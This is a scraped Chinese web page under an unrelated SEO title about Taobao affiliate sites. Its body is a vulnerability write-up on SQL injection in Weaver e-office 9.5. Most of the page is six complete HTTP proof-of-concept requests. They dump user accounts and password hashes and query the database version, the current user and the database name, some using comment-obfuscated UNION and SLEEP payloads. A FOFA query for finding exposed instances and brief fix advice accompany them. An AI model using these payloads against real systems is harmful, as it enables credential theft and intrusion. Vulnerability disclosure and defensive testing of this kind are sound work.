当前位置：首页 > news >正文

淘宝客没网站怎么做哪家app定制开发好

news 2025/11/14 21:04:14

淘宝客没网站怎么做,哪家app定制开发好,便利的网站建设,中国服务器市场0x01 产品简介泛微E-Office是一款标准化的协同 OA 办公软件#xff0c;泛微协同办公产品系列成员之一,实行通用化产品设计#xff0c;充分贴合企业管理需求#xff0c;本着简洁易用、高效智能的原则#xff0c;为企业快速打造移动化、无纸化、数字化的办公平台。 0x02 漏…0x01 产品简介泛微E-Office是一款标准化的协同 OA 办公软件泛微协同办公产品系列成员之一,实行通用化产品设计充分贴合企业管理需求本着简洁易用、高效智能的原则为企业快速打造移动化、无纸化、数字化的办公平台。 0x02 漏洞概述泛微e-office json_common.php、flow_xml.php、sms_page.php、getUserLists、detail.php、Init.php等接口处存在SQL注入漏洞未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息例如管理员后台密码、站点用户个人信息之外攻击者甚至可以在高权限下向服务器写入命令进一步获取服务器系统权限。 0x03 影响范围 e-office 9.5 0x04 复现环境 FOFAapp泛微-EOffice 0x05 漏洞复现 PoC-1 POST /building/json_common.php HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gziptfscity%60wherecityId%3D-1%2F%2A%2150000union%2A%2F%2F%2A%2150000all%2A%2F%2F%2A%2150000select%2A%2F1%2C2%2C%28%2F%2A%2150000select%2A%2Fgroup_concat%28user_id%2Cuser_accounts%2Cuser_name%2Cpassword%29fromuser%29%2C4%23%7C2 获取用户账号密码信息 PoC-2 GET /general/system/workflow/flow_type/flow_xml.php?SORT_ID1UNIONALLSELECTCONCAT%280x716a717071%2C%40%40version%2C0x716a717071%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--- HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip 查询数据库版本 PoC-3 GET /E-mobile/sms_page.php?detailid123%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7e,user(),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1 Host: your-ip Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 查询当前用户 PoC-4 GET /E-mobile/App/System/UserSelect/index.php?mgetUserListsprivId1UNIONALLSELECTNULL,NULL,NULL,NULL,NULL,NULL,(concat(database()))-- HTTP/1.1 Host: your-ip Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 查询当前数据库 PoC-5 POST /general/crm/linkman/query/detail.php HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded; charsetutf-8 Cookie: PHPSESSIDeff067b73c42eed28e55fd037563593a; LOGIN_LANGcn; expiresTue, 22-Apr-2025 14:54:24 GMT Accept-Encoding: gziplinkman_id1%20AND%20%28SELECT%205830%20FROM%20%28SELECT%28SLEEP%285%29%29%29mDdD%29 延时5秒 PoC-6 POST /E-mobile/App/Init.php?mgetSelectList_Crm HTTP/1.1 Host: your-ip Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15cc_parent_id-999%2F%2A%2150000union%2A%2F%2F%2A%2150000all%2A%2F%2F%2A%2150000select%2A%2F1%2C%28%2F%2A%2150000select%2A%2Fuser%28%29%29%23 查询当前用户 0x06 修复建议厂商已发布了漏洞修复程序请及时关注更新https://www.e-office.cn/ 临时修复方案通过防火墙等安全设备设置访问策略设置白名单访问。如非必要禁止公网访问该系统。

查看全文

http://www.zqtcl.cn/news/253855/